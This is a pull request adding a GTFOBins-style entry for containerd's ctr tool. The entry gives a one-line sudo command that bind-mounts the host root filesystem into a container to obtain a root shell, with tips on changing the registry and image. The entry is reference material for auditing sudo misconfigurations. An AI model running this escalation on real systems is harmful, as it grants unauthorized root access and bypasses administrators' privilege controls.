### PR TITLE
containerd (ctr) root shell

### DIFF
--- a/_gtfobins/ctr
+++ b/_gtfobins/ctr
@@ -1,0 +1,8 @@
+---
+functions:
+  sudo:
+   - description: |
+      If ctr sudo permissions, you can use it to escape to a root shell. It is necessary to add an existing image.
+   - code: |
+      sudo /usr/bin/ctr run --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest bash
+---


### PR DESCRIPTION
Sometimes it is necessary to make changes to parameters such as docker.io, which would be registry:5000 or others. Also, adding an existing image is the main thing.